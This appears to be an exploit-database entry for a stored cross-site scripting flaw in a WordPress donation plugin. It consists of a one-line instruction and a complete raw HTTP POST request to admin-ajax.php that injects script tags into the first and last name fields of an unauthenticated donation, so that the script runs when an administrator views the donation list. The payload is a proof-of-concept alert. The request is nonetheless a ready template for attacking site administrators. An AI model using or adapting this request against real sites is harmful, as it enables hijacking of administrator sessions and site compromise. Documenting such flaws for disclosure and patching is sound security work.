Share
## https://sploitus.com/exploit?id=WPEX-ID:E3B23F22-D019-4E20-A238-0FEB59A5760F
Submit (as unauth) a donation with <script>alert(/XSS/)</script> as First Name or Last Name, then view the donation lists as admin to trigger the XSS

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 501
Connection: close
charitable_form_id=60f1bb21849de&60f1bb21849de=&_charitable_donation_nonce=dd32c048d6&_wp_http_referer=%2Fwordpress%2Fcampaigns%2Ftest%2Fdonate%2F&campaign_id=1148&description=Test&ID=0&gateway=offline&custom_donation_amount=1.00&first_name=test%22%3E%3Cscript%3Ealert(%2FXSS-FN%2F)%3C%2Fscript%3E&last_name=test%22%3E%3Cscript%3Ealert(%2FXSS-LN%2F)%3C%2Fscript%3E&email=fjrekhg%40nferhf.com&address=&address_2=&city=&state=&postcode=&country=AF&phone=&action=make_donation&form_action=make_donation